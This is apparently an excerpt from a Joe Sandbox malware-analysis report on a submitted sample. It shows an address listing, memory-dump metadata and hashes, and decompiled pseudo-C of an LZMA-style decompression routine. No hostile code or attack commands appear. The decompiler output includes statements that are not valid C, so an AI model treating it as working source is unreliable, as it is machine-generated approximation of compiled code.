                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef3
                                                          0x00406ef6
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1d
                                                          0x00406f1d
                                                          0x00406f20
                                                          0x00406f24
                                                          0x00406f26
                                                          0x00406efe
                                                          0x00406efe
                                                          0x00406f06
                                                          0x00406f0b
                                                          0x00406f0d
                                                          0x00406f0f
                                                          0x00406f0f
                                                          0x00406f29
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00406f35
                                                          0x00000000
                                                          0x00406f35
                                                          0x00406f33
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f75
                                                          0x00406f75
                                                          0x00406f79
                                                          0x00407581
                                                          0x00000000
                                                          0x00407581
                                                          0x00406f7f
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00406f89
                                                          0x00406f8c
                                                          0x00406f92
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f97
                                                          0x00406f9a
                                                          0x00406f9a
                                                          0x00406fa0
                                                          0x00406f3e
                                                          0x00406f3e
                                                          0x00406f41
                                                          0x00000000
                                                          0x00406f41
                                                          0x00406fa2
                                                          0x00406fa2
                                                          0x00406fa5
                                                          0x00406fa8
                                                          0x00406fab
                                                          0x00406fae
                                                          0x00406fb1
                                                          0x00406fb4
                                                          0x00406fb7
                                                          0x00406fba
                                                          0x00406fbd
                                                          0x00406fc0
                                                          0x00406fd8
                                                          0x00406fdb
                                                          0x00406fde
                                                          0x00406fe1
                                                          0x00406fe1
                                                          0x00406fe4
                                                          0x00406fe8
                                                          0x00406fea
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fca
                                                          0x00406fcf
                                                          0x00406fd1
                                                          0x00406fd3
                                                          0x00406fd3
                                                          0x00406fed
                                                          0x00406ff4
                                                          0x00406ff7
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00407286
                                                          0x00407286
                                                          0x0040728a
                                                          0x004075b1
                                                          0x00000000
                                                          0x004075b1
                                                          0x00407290
                                                          0x00407293
                                                          0x00407296
                                                          0x0040729a
                                                          0x0040729d
                                                          0x004072a3
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407395
                                                          0x00407399
                                                          0x004073bb
                                                          0x004073be
                                                          0x004073c8
                                                          0x00000000
                                                          0x004073c8
                                                          0x0040739b
                                                          0x0040739e
                                                          0x004073a2
                                                          0x004073a5
                                                          0x004073a5
                                                          0x004073a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407452
                                                          0x00407456
                                                          0x00407474
                                                          0x00407474
                                                          0x00407474
                                                          0x0040747b
                                                          0x00407482
                                                          0x00407489
                                                          0x00407489
                                                          0x00000000
                                                          0x00407489
                                                          0x00407458
                                                          0x0040745b
                                                          0x0040745e
                                                          0x00407461
                                                          0x00407468
                                                          0x004073ac
                                                          0x004073ac
                                                          0x004073af
                                                          0x00000000
                                                          0x00000000
                                                          0x00407543
                                                          0x00407546
                                                          0x00000000
                                                          0x00000000
                                                          0x0040717d
                                                          0x0040717f
                                                          0x00407186
                                                          0x00407187
                                                          0x00407189
                                                          0x0040718c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407194
                                                          0x00407197
                                                          0x0040719a
                                                          0x0040719c
                                                          0x0040719e
                                                          0x0040719e
                                                          0x0040719f
                                                          0x004071a2
                                                          0x004071a9
                                                          0x004071ac
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x00407490
                                                          0x00407490
                                                          0x00407493
                                                          0x0040749a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040749f
                                                          0x0040749f
                                                          0x004074a3
                                                          0x004075db
                                                          0x00000000
                                                          0x004075db
                                                          0x004074a9
                                                          0x004074ac
                                                          0x004074af
                                                          0x004074b3
                                                          0x004074b6
                                                          0x004074bc
                                                          0x004074be
                                                          0x004074be
                                                          0x004074be
                                                          0x004074c1
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c7
                                                          0x004074c7
                                                          0x004074cb
                                                          0x0040752b
                                                          0x0040752e
                                                          0x00407533
                                                          0x00407534
                                                          0x00407536
                                                          0x00407538
                                                          0x0040753b
                                                          0x00000000
                                                          0x0040753b
                                                          0x004074cd
                                                          0x004074d3
                                                          0x004074d6
                                                          0x004074d9
                                                          0x004074dc
                                                          0x004074df
                                                          0x004074e2
                                                          0x004074e5
                                                          0x004074e8
                                                          0x004074eb
                                                          0x004074ee
                                                          0x00407507
                                                          0x0040750a
                                                          0x0040750d
                                                          0x00407510
                                                          0x00407514
                                                          0x00407516
                                                          0x00407516
                                                          0x00407517
                                                          0x0040751a
                                                          0x004074f0
                                                          0x004074f0
                                                          0x004074f8
                                                          0x004074fd
                                                          0x004074ff
                                                          0x00407502
                                                          0x00407502
                                                          0x0040751d
                                                          0x00407524
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x004071c2
                                                          0x004071c5
                                                          0x004071fb
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732e
                                                          0x0040732e
                                                          0x00407331
                                                          0x00407333
                                                          0x004075bd
                                                          0x00000000
                                                          0x004075bd
                                                          0x00407339
                                                          0x0040733c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407342
                                                          0x00407346
                                                          0x00407349
                                                          0x00407349
                                                          0x00407349
                                                          0x00000000
                                                          0x00407349
                                                          0x004071c7
                                                          0x004071c9
                                                          0x004071cb
                                                          0x004071cd
                                                          0x004071d0
                                                          0x004071d1
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d8
                                                          0x004071db
                                                          0x004071f1
                                                          0x004071f6
                                                          0x0040722e
                                                          0x0040722e
                                                          0x00407232
                                                          0x0040725e
                                                          0x00407260
                                                          0x00407267
                                                          0x0040726a
                                                          0x0040726d
                                                          0x0040726d
                                                          0x00407272
                                                          0x00407272
                                                          0x00407274
                                                          0x00407277
                                                          0x0040727e
                                                          0x00407281
                                                          0x004072ae
                                                          0x004072ae
                                                          0x004072b1
                                                          0x004072b4
                                                          0x00407328
                                                          0x00407328
                                                          0x00407328
                                                          0x00000000
                                                          0x00407328
                                                          0x004072b6
                                                          0x004072bc
                                                          0x004072bf
                                                          0x004072c2
                                                          0x004072c5
                                                          0x004072c8
                                                          0x004072cb
                                                          0x004072ce
                                                          0x004072d1
                                                          0x004072d4
                                                          0x004072d7
                                                          0x004072f0
                                                          0x004072f2
                                                          0x004072f5
                                                          0x004072f6
                                                          0x004072f9
                                                          0x004072fb
                                                          0x004072fe
                                                          0x00407300
                                                          0x00407302
                                                          0x00407305
                                                          0x00407307
                                                          0x0040730a
                                                          0x0040730e
                                                          0x00407310
                                                          0x00407310
                                                          0x00407311
                                                          0x00407314
                                                          0x00407317
                                                          0x004072d9
                                                          0x004072d9
                                                          0x004072e1
                                                          0x004072e6
                                                          0x004072e8
                                                          0x004072eb
                                                          0x004072eb
                                                          0x0040731a
                                                          0x00407321
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x00000000
                                                          0x00407323
                                                          0x00000000
                                                          0x00407323
                                                          0x00407321
                                                          0x00407234
                                                          0x00407237
                                                          0x00407239
                                                          0x0040723c
                                                          0x0040723f
                                                          0x00407242
                                                          0x00407244
                                                          0x00407247
                                                          0x0040724a
                                                          0x0040724a
                                                          0x0040724d
                                                          0x0040724d
                                                          0x00407250
                                                          0x00407257
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x00000000
                                                          0x00407259
                                                          0x00000000
                                                          0x00407259
                                                          0x00407257
                                                          0x004071dd
                                                          0x004071e0
                                                          0x004071e2
                                                          0x004071e5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f44
                                                          0x00406f44
                                                          0x00406f48
                                                          0x0040758d
                                                          0x00000000
                                                          0x0040758d
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f5a
                                                          0x00406f5d
                                                          0x00406f60
                                                          0x00406f62
                                                          0x00406f65
                                                          0x00406f68
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x00000000
                                                          0x00407390
                                                          0x0040738e
                                                          0x004075c3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                          • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                          • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                          • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E00406BB0(void* __ecx) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				signed int _v16;
                                                          				unsigned int _v20;
                                                          				signed int _v24;
                                                          				signed int _v28;
                                                          				signed int _v32;
                                                          				signed int _v36;
                                                          				signed int _v40;
                                                          				signed int _v44;
                                                          				signed int _v48;
                                                          				signed int _v52;
                                                          				signed int _v56;
                                                          				signed int _v60;
                                                          				signed int _v64;
                                                          				signed int _v68;
                                                          				signed int _v72;
                                                          				signed int _v76;
                                                          				signed int _v80;
                                                          				signed int _v84;
                                                          				signed int _v88;
                                                          				signed int _v92;
                                                          				signed int _v95;
                                                          				signed int _v96;
                                                          				signed int _v100;
                                                          				signed int _v104;
                                                          				signed int _v108;
                                                          				signed int _v112;
                                                          				signed int _v116;
                                                          				signed int _v120;
                                                          				intOrPtr _v124;
                                                          				signed int _v128;
                                                          				signed int _v132;
                                                          				signed int _v136;
                                                          				void _v140;
                                                          				void* _v148;
                                                          				signed int _t537;
                                                          				signed int _t538;
                                                          				signed int _t572;
                                                          
                                                          				_t572 = 0x22;
                                                          				_v148 = __ecx;
                                                          				memcpy( &_v140, __ecx, _t572 << 2);
                                                          				if(_v52 == 0xffffffff) {
                                                          					return 1;
                                                          				}
                                                          				while(1) {
                                                          					L3:
                                                          					_t537 = _v140;
                                                          					if(_t537 > 0x1c) {
                                                          						break;
                                                          					}
                                                          					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                                                          						case 0:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								goto L173;
                                                          							}
                                                          							_v112 = _v112 - 1;
                                                          							_v116 = _v116 + 1;
                                                          							_t537 =  *_v116;
                                                          							__eflags = _t537 - 0xe1;
                                                          							if(_t537 > 0xe1) {
                                                          								goto L174;
                                                          							}
                                                          							_t542 = _t537 & 0x000000ff;
                                                          							_push(0x2d);
                                                          							asm("cdq");
                                                          							_pop(_t576);
                                                          							_push(9);
                                                          							_pop(_t577);
                                                          							_t622 = _t542 / _t576;
                                                          							_t544 = _t542 % _t576 & 0x000000ff;
                                                          							asm("cdq");
                                                          							_t617 = _t544 % _t577 & 0x000000ff;
                                                          							_v64 = _t617;
                                                          							_v32 = (1 << _t622) - 1;
                                                          							_v28 = (1 << _t544 / _t577) - 1;
                                                          							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                          							__eflags = 0x600 - _v124;
                                                          							if(0x600 == _v124) {
                                                          								L12:
                                                          								__eflags = _t625;
                                                          								if(_t625 == 0) {
                                                          									L14:
                                                          									_v76 = _v76 & 0x00000000;
                                                          									_v68 = _v68 & 0x00000000;
                                                          									goto L17;
                                                          								} else {
                                                          									goto L13;
                                                          								}
                                                          								do {
                                                          									L13:
                                                          									_t625 = _t625 - 1;
                                                          									__eflags = _t625;
                                                          									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                          								} while (_t625 != 0);
                                                          								goto L14;
                                                          							}
                                                          							__eflags = _v8;
                                                          							if(_v8 != 0) {
                                                          								GlobalFree(_v8);
                                                          							}
                                                          							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                          							__eflags = _t537;
                                                          							_v8 = _t537;
                                                          							if(_t537 == 0) {
                                                          								goto L174;
                                                          							} else {
                                                          								_v124 = 0x600;
                                                          								goto L12;
                                                          							}
                                                          						case 1:
                                                          							L15:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 1;
                                                          								goto L173;
                                                          							}
                                                          							_v112 = _v112 - 1;
                                                          							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                          							_v116 = _v116 + 1;
                                                          							_t50 =  &_v76;
                                                          							 *_t50 = _v76 + 1;
                                                          							__eflags =  *_t50;
                                                          							L17:
                                                          							__eflags = _v76 - 4;
                                                          							if(_v76 < 4) {
                                                          								goto L15;
                                                          							}
                                                          							_t550 = _v68;
                                                          							__eflags = _t550 - _v120;
                                                          							if(_t550 == _v120) {
                                                          								L22:
                                                          								_v76 = 5;
                                                          								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                          								goto L25;
                                                          							}
                                                          							__eflags = _v12;
                                                          							_v120 = _t550;
                                                          							if(_v12 != 0) {
                                                          								GlobalFree(_v12);
                                                          							}
                                                          							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                          							__eflags = _t537;
                                                          							_v12 = _t537;
                                                          							if(_t537 == 0) {
                                                          								goto L174;
                                                          							} else {
                                                          								goto L22;
                                                          							}
                                                          						case 2:
                                                          							L26:
                                                          							_t557 = _v100 & _v32;
                                                          							_v136 = 6;
                                                          							_v80 = _t557;
                                                          							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                          							goto L135;
                                                          						case 3:
                                                          							L23:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 3;
                                                          								goto L173;
                                                          							}
                                                          							_v112 = _v112 - 1;
                                                          							_t72 =  &_v116;
                                                          							 *_t72 = _v116 + 1;
                                                          							__eflags =  *_t72;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L25:
                                                          							_v76 = _v76 - 1;
                                                          							__eflags = _v76;
                                                          							if(_v76 != 0) {
                                                          								goto L23;
                                                          							}
                                                          							goto L26;
                                                          						case 4:
                                                          							L136:
                                                          							_t559 =  *_t626;
                                                          							_t610 = _t559 & 0x0000ffff;
                                                          							_t591 = (_v20 >> 0xb) * _t610;
                                                          							__eflags = _v16 - _t591;
                                                          							if(_v16 >= _t591) {
                                                          								_v20 = _v20 - _t591;
                                                          								_v16 = _v16 - _t591;
                                                          								_v68 = 1;
                                                          								_t560 = _t559 - (_t559 >> 5);
                                                          								__eflags = _t560;
                                                          								 *_t626 = _t560;
                                                          							} else {
                                                          								_v20 = _t591;
                                                          								_v68 = _v68 & 0x00000000;
                                                          								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                          							}
                                                          							__eflags = _v20 - 0x1000000;
                                                          							if(_v20 >= 0x1000000) {
                                                          								goto L142;
                                                          							} else {
                                                          								goto L140;
                                                          							}
                                                          						case 5:
                                                          							L140:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 5;
                                                          								goto L173;
                                                          							}
                                                          							_v20 = _v20 << 8;
                                                          							_v112 = _v112 - 1;
                                                          							_t464 =  &_v116;
                                                          							 *_t464 = _v116 + 1;
                                                          							__eflags =  *_t464;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L142:
                                                          							_t561 = _v136;
                                                          							goto L143;
                                                          						case 6:
                                                          							__edx = 0;
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__eax = _v8;
                                                          								__ecx = _v60;
                                                          								_v56 = 1;
                                                          								_v136 = 7;
                                                          								__esi = _v8 + 0x180 + _v60 * 2;
                                                          								goto L135;
                                                          							}
                                                          							__eax = _v96 & 0x000000ff;
                                                          							__esi = _v100;
                                                          							__cl = 8;
                                                          							__cl = 8 - _v64;
                                                          							__esi = _v100 & _v28;
                                                          							__eax = (_v96 & 0x000000ff) >> 8;
                                                          							__ecx = _v64;
                                                          							__esi = (_v100 & _v28) << 8;
                                                          							__ecx = _v8;
                                                          							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                          							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                          							__eflags = _v60 - 4;
                                                          							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                          							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                          							if(_v60 >= 4) {
                                                          								__eflags = _v60 - 0xa;
                                                          								if(_v60 >= 0xa) {
                                                          									_t103 =  &_v60;
                                                          									 *_t103 = _v60 - 6;
                                                          									__eflags =  *_t103;
                                                          								} else {
                                                          									_v60 = _v60 - 3;
                                                          								}
                                                          							} else {
                                                          								_v60 = 0;
                                                          							}
                                                          							__eflags = _v56 - __edx;
                                                          							if(_v56 == __edx) {
                                                          								__ebx = 0;
                                                          								__ebx = 1;
                                                          								goto L63;
                                                          							}
                                                          							__eax = _v24;
                                                          							__eax = _v24 - _v48;
                                                          							__eflags = __eax - _v120;
                                                          							if(__eax >= _v120) {
                                                          								__eax = __eax + _v120;
                                                          								__eflags = __eax;
                                                          							}
                                                          							__ecx = _v12;
                                                          							__ebx = 0;
                                                          							__ebx = 1;
                                                          							__al =  *((intOrPtr*)(__eax + __ecx));
                                                          							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                          							goto L43;
                                                          						case 7:
                                                          							__eflags = _v68 - 1;
                                                          							if(_v68 != 1) {
                                                          								__eax = _v40;
                                                          								_v132 = 0x16;
                                                          								_v36 = _v40;
                                                          								__eax = _v44;
                                                          								_v40 = _v44;
                                                          								__eax = _v48;
                                                          								_v44 = _v48;
                                                          								__eax = 0;
                                                          								__eflags = _v60 - 7;
                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          								__al = __al & 0x000000fd;
                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                          								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                          								__eax = _v8;
                                                          								__eax = _v8 + 0x664;
                                                          								__eflags = __eax;
                                                          								_v92 = __eax;
                                                          								goto L71;
                                                          							}
                                                          							__eax = _v8;
                                                          							__ecx = _v60;
                                                          							_v136 = 8;
                                                          							__esi = _v8 + 0x198 + _v60 * 2;
                                                          							goto L135;
                                                          						case 8:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__eax = _v8;
                                                          								__ecx = _v60;
                                                          								_v136 = 0xa;
                                                          								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                          							} else {
                                                          								__eax = _v60;
                                                          								__ecx = _v8;
                                                          								__eax = _v60 + 0xf;
                                                          								_v136 = 9;
                                                          								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                          								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                          							}
                                                          							goto L135;
                                                          						case 9:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								goto L92;
                                                          							}
                                                          							__eflags = _v100;
                                                          							if(_v100 == 0) {
                                                          								goto L174;
                                                          							}
                                                          							__eax = 0;
                                                          							__eflags = _v60 - 7;
                                                          							_t264 = _v60 - 7 >= 0;
                                                          							__eflags = _t264;
                                                          							0 | _t264 = _t264 + _t264 + 9;
                                                          							_v60 = _t264 + _t264 + 9;
                                                          							goto L78;
                                                          						case 0xa:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__eax = _v8;
                                                          								__ecx = _v60;
                                                          								_v136 = 0xb;
                                                          								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                          								goto L135;
                                                          							}
                                                          							__eax = _v44;
                                                          							goto L91;
                                                          						case 0xb:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__ecx = _v40;
                                                          								__eax = _v36;
                                                          								_v36 = _v40;
                                                          							} else {
                                                          								__eax = _v40;
                                                          							}
                                                          							__ecx = _v44;
                                                          							_v40 = _v44;
                                                          							L91:
                                                          							__ecx = _v48;
                                                          							_v48 = __eax;
                                                          							_v44 = _v48;
                                                          							L92:
                                                          							__eax = _v8;
                                                          							_v132 = 0x15;
                                                          							__eax = _v8 + 0xa68;
                                                          							_v92 = _v8 + 0xa68;
                                                          							goto L71;
                                                          						case 0xc:
                                                          							L102:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0xc;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t340 =  &_v116;
                                                          							 *_t340 = _v116 + 1;
                                                          							__eflags =  *_t340;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							__eax = _v48;
                                                          							goto L104;
                                                          						case 0xd:
                                                          							L39:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0xd;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t127 =  &_v116;
                                                          							 *_t127 = _v116 + 1;
                                                          							__eflags =  *_t127;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L41:
                                                          							__eax = _v68;
                                                          							__eflags = _v76 - _v68;
                                                          							if(_v76 != _v68) {
                                                          								goto L50;
                                                          							}
                                                          							__eflags = __ebx - 0x100;
                                                          							if(__ebx >= 0x100) {
                                                          								goto L56;
                                                          							}
                                                          							L43:
                                                          							__eax = _v95 & 0x000000ff;
                                                          							_v95 = _v95 << 1;
                                                          							__ecx = _v92;
                                                          							__eax = (_v95 & 0x000000ff) >> 7;
                                                          							_v76 = __eax;
                                                          							__eax = __eax + 1;
                                                          							__eax = __eax << 8;
                                                          							__eax = __eax + __ebx;
                                                          							__esi = _v92 + __eax * 2;
                                                          							_v20 = _v20 >> 0xb;
                                                          							__ax =  *__esi;
                                                          							_v88 = __esi;
                                                          							__edx = __ax & 0x0000ffff;
                                                          							__ecx = (_v20 >> 0xb) * __edx;
                                                          							__eflags = _v16 - __ecx;
                                                          							if(_v16 >= __ecx) {
                                                          								_v20 = _v20 - __ecx;
                                                          								_v16 = _v16 - __ecx;
                                                          								__cx = __ax;
                                                          								_v68 = 1;
                                                          								__cx = __ax >> 5;
                                                          								__eflags = __eax;
                                                          								__ebx = __ebx + __ebx + 1;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								_v68 = _v68 & 0x00000000;
                                                          								_v20 = __ecx;
                                                          								0x800 = 0x800 - __edx;
                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags = _v20 - 0x1000000;
                                                          							_v72 = __ebx;
                                                          							if(_v20 >= 0x1000000) {
                                                          								goto L41;
                                                          							} else {
                                                          								goto L39;
                                                          							}
                                                          						case 0xe:
                                                          							L48:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0xe;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t161 =  &_v116;
                                                          							 *_t161 = _v116 + 1;
                                                          							__eflags =  *_t161;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							while(1) {
                                                          								L50:
                                                          								__eflags = __ebx - 0x100;
                                                          								if(__ebx >= 0x100) {
                                                          									break;
                                                          								}
                                                          								__eax = _v92;
                                                          								__edx = __ebx + __ebx;
                                                          								__ecx = _v20;
                                                          								__esi = __edx + __eax;
                                                          								__ecx = _v20 >> 0xb;
                                                          								__ax =  *__esi;
                                                          								_v88 = __esi;
                                                          								__edi = __ax & 0x0000ffff;
                                                          								__ecx = (_v20 >> 0xb) * __edi;
                                                          								__eflags = _v16 - __ecx;
                                                          								if(_v16 >= __ecx) {
                                                          									_v20 = _v20 - __ecx;
                                                          									_v16 = _v16 - __ecx;
                                                          									__cx = __ax;
                                                          									_t175 = __edx + 1; // 0x1
                                                          									__ebx = _t175;
                                                          									__cx = __ax >> 5;
                                                          									__eflags = __eax;
                                                          									 *__esi = __ax;
                                                          								} else {
                                                          									_v20 = __ecx;
                                                          									0x800 = 0x800 - __edi;
                                                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          									__ebx = __ebx + __ebx;
                                                          									 *__esi = __cx;
                                                          								}
                                                          								__eflags = _v20 - 0x1000000;
                                                          								_v72 = __ebx;
                                                          								if(_v20 >= 0x1000000) {
                                                          									continue;
                                                          								} else {
                                                          									goto L48;
                                                          								}
                                                          							}
                                                          							L56:
                                                          							_t178 =  &_v56;
                                                          							 *_t178 = _v56 & 0x00000000;
                                                          							__eflags =  *_t178;
                                                          							goto L57;
                                                          						case 0xf:
                                                          							L60:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0xf;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t208 =  &_v116;
                                                          							 *_t208 = _v116 + 1;
                                                          							__eflags =  *_t208;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L62:
                                                          							__eflags = __ebx - 0x100;
                                                          							if(__ebx >= 0x100) {
                                                          								L57:
                                                          								__al = _v72;
                                                          								_v96 = _v72;
                                                          								goto L58;
                                                          							}
                                                          							L63:
                                                          							__eax = _v92;
                                                          							__edx = __ebx + __ebx;
                                                          							__ecx = _v20;
                                                          							__esi = __edx + __eax;
                                                          							__ecx = _v20 >> 0xb;
                                                          							__ax =  *__esi;
                                                          							_v88 = __esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = (_v20 >> 0xb) * __edi;
                                                          							__eflags = _v16 - __ecx;
                                                          							if(_v16 >= __ecx) {
